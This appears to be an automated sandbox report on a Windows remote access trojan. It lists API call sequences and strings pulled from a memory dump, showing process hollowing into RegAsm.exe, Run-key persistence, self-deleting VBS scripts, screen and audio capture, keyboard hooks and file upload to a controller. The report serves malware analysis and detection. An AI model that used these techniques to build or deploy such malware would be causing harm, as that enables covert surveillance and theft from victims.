                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: ErrorLast$InfoLocale_abort_free
              • String ID:
              • API String ID: 2692324296-0
              APIs
                • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
              • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: CriticalEnterEnumLocalesSectionSystem
              • String ID:
              • API String ID: 1272433827-0
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: ErrorLast$EnumLocalesSystem_abort_free
              • String ID:
              • API String ID: 1084509184-0
              APIs
              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              APIs
              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
              • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
              • DeleteDC.GDI32(00000000), ref: 00418F2A
              • DeleteDC.GDI32(00000000), ref: 00418F2D
              • DeleteObject.GDI32(00000000), ref: 00418F30
              • SelectObject.GDI32(00000000,00000000), ref: 00418F51
              • DeleteDC.GDI32(00000000), ref: 00418F62
              • DeleteDC.GDI32(00000000), ref: 00418F65
              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
              • GetIconInfo.USER32 ref: 00418FBD
              • DeleteObject.GDI32(?), ref: 00418FEC
              • DeleteObject.GDI32(?), ref: 00418FF9
              • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
              • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
              • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
              • DeleteDC.GDI32(?), ref: 0041917C
              • DeleteDC.GDI32(00000000), ref: 0041917F
              • DeleteObject.GDI32(00000000), ref: 00419182
              • GlobalFree.KERNEL32(?), ref: 0041918D
              • DeleteObject.GDI32(00000000), ref: 00419241
              • GlobalFree.KERNEL32(?), ref: 00419248
              • DeleteDC.GDI32(?), ref: 00419258
              • DeleteDC.GDI32(00000000), ref: 00419263
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
              • String ID: DISPLAY
              • API String ID: 479521175-865373369
              APIs
              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
              • GetProcAddress.KERNEL32(00000000), ref: 00418139
              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
              • GetProcAddress.KERNEL32(00000000), ref: 0041814D
              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
              • GetProcAddress.KERNEL32(00000000), ref: 00418161
              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
              • GetProcAddress.KERNEL32(00000000), ref: 00418175
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
              • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
              • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
              • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
              • ResumeThread.KERNEL32(?), ref: 00418435
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
              • GetCurrentProcess.KERNEL32(?), ref: 00418457
              • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
              • GetLastError.KERNEL32 ref: 0041847A
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
              • API String ID: 4188446516-3035715614
              APIs
                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
              • ExitProcess.KERNEL32 ref: 0040D7D0
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
              • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
              APIs
                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65941986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
              • ExitProcess.KERNEL32 ref: 0040D419
              Similarity
              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
              • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
              APIs
              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
              • ExitProcess.KERNEL32(00000000), ref: 004124A0
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
              • CloseHandle.KERNEL32(00000000), ref: 0041253B
              • GetCurrentProcessId.KERNEL32 ref: 00412541
              • PathFileExistsW.SHLWAPI(?), ref: 00412572
              • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
              • lstrcatW.KERNEL32 ref: 00412601
                • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
              • Sleep.KERNEL32(000001F4), ref: 00412682
              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
              • CloseHandle.KERNEL32(00000000), ref: 004126A9
              • GetCurrentProcessId.KERNEL32 ref: 004126AF
              Similarity
              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
              • String ID: .exe$8SG$WDH$exepath$open$temp_
              APIs
              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
              • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
              • SetEvent.KERNEL32 ref: 0041B219
              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
              • CloseHandle.KERNEL32 ref: 0041B23A
              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
              Similarity
              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
              APIs
              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
              Similarity
              • API ID: File$Write$Create
              • String ID: RIFF$WAVE$data$fmt
              APIs
              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
              • GetProcAddress.KERNEL32(00000000), ref: 0040728D
              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
              • GetProcAddress.KERNEL32(00000000), ref: 004072A5
              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
              • GetProcAddress.KERNEL32(00000000), ref: 004072B9
              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
              • GetProcAddress.KERNEL32(00000000), ref: 004072CD
              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
              • GetProcAddress.KERNEL32(00000000), ref: 004072E1
              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
              • GetProcAddress.KERNEL32(00000000), ref: 004072F5
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
              APIs
              • _wcslen.LIBCMT ref: 0040CE07
              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
              • CopyFileW.KERNEL32 ref: 0040CED0
              • _wcslen.LIBCMT ref: 0040CEE6
              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
              • CopyFileW.KERNEL32 ref: 0040CF84
              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
              • _wcslen.LIBCMT ref: 0040CFC6
              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
              • CloseHandle.KERNEL32 ref: 0040D02D
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
              • ExitProcess.KERNEL32 ref: 0040D062
              Similarity
              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
              • String ID: 6$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$del$open
              APIs
              • lstrlenW.KERNEL32(?), ref: 0041C036
              • _memcmp.LIBVCRUNTIME ref: 0041C04E
              • lstrlenW.KERNEL32(?), ref: 0041C067
              • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
              • lstrcmpW.KERNEL32(?,?), ref: 0041C114
              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
              • _wcslen.LIBCMT ref: 0041C13B
              • FindVolumeClose.KERNEL32 ref: 0041C15B
              • GetLastError.KERNEL32 ref: 0041C173
              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
              • lstrcatW.KERNEL32 ref: 0041C1B9
              • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
              • GetLastError.KERNEL32 ref: 0041C1D0
              Similarity
              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
              • String ID: ?
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65941986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
              • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
              • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
              • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
              • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
              • Sleep.KERNEL32(00000064), ref: 00412E94
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Similarity
              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
              • String ID: /stext "$0TG$0TG$NG$NG
              APIs
              Similarity
              • API ID: _free$EnvironmentVariable
              APIs
              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
              • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
              • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
              Similarity
              • API ID: CloseEnumOpen
              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
              APIs
              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
              • GetCursorPos.USER32(?), ref: 0041D5E9
              • SetForegroundWindow.USER32(?), ref: 0041D5F2
              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
              • ExitProcess.KERNEL32 ref: 0041D665
              • CreatePopupMenu.USER32 ref: 0041D66B
              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
              Similarity
              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
              • String ID: Close
              APIs
              Similarity
              • API ID: _free$Info
              APIs
              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
              • __aulldiv.LIBCMT ref: 00408D4D
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
              • CloseHandle.KERNEL32(00000000), ref: 00408F64
              • CloseHandle.KERNEL32(00000000), ref: 00408FAE
              • CloseHandle.KERNEL32(00000000), ref: 00408FFC
              Similarity
              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
              APIs
              • ___free_lconv_mon.LIBCMT ref: 0045130A
                • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
              • _free.LIBCMT ref: 004512FF
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00451321
              • _free.LIBCMT ref: 00451336
              • _free.LIBCMT ref: 00451341
              • _free.LIBCMT ref: 00451363
              • _free.LIBCMT ref: 00451376
              • _free.LIBCMT ref: 00451384
              • _free.LIBCMT ref: 0045138F
              • _free.LIBCMT ref: 004513C7
              • _free.LIBCMT ref: 004513CE
              • _free.LIBCMT ref: 004513EB
              • _free.LIBCMT ref: 00451403
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              APIs
              • __EH_prolog.LIBCMT ref: 00419FB9
              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
              • Sleep.KERNEL32(000003E8), ref: 0041A0FD
              • GetLocalTime.KERNEL32(?), ref: 0041A105
              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
              Similarity
              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
              APIs
                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
              • ExitProcess.KERNEL32 ref: 0040D9C4
              Similarity
              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
              • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
              APIs
              Similarity
              • API ID: _free
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
              • CloseHandle.KERNEL32(?), ref: 00404E4C
              • closesocket.WS2_32(000000FF), ref: 00404E5A
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
              • CloseHandle.KERNEL32(?), ref: 00404EBF
              • CloseHandle.KERNEL32(?), ref: 00404EC4
              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
              • CloseHandle.KERNEL32(?), ref: 00404ED6
              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
              • String ID:
              APIs
                • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
              • GetLastError.KERNEL32 ref: 00455CEF
              • __dosmaperr.LIBCMT ref: 00455CF6
              • GetFileType.KERNEL32 ref: 00455D02
              • GetLastError.KERNEL32 ref: 00455D0C
              • __dosmaperr.LIBCMT ref: 00455D15
              • CloseHandle.KERNEL32(00000000), ref: 00455D35
              • CloseHandle.KERNEL32(?), ref: 00455E7F
              • GetLastError.KERNEL32 ref: 00455EB1
              • __dosmaperr.LIBCMT ref: 00455EB8
              Strings
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              APIs
              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
              • __alloca_probe_16.LIBCMT ref: 00453EEA
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
              • __alloca_probe_16.LIBCMT ref: 00453F94
              • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
              • __freea.LIBCMT ref: 00454003
              • __freea.LIBCMT ref: 0045400F
              Strings
              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
              • String ID: \@E
              APIs
              Strings
              • API ID: _free
              • String ID: \&G$\&G$`&G
              Strings
              • API ID:
              • String ID: 65535$udp
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
              • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
              • __dosmaperr.LIBCMT ref: 0043A8A6
              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
              • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
              • __dosmaperr.LIBCMT ref: 0043A8E3
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
              • __dosmaperr.LIBCMT ref: 0043A937
              • _free.LIBCMT ref: 0043A943
              • _free.LIBCMT ref: 0043A94A
              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
              • String ID:
              APIs
              • SetEvent.KERNEL32(?,?), ref: 004054BF
              • GetMessageA.USER32 ref: 0040556F
              • TranslateMessage.USER32(?), ref: 0040557E
              • DispatchMessageA.USER32 ref: 00405589
              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
